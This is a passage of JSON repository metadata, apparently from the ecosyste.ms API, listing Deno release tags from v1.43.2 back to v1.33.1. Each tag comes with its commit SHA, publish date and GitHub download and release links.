es/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"depende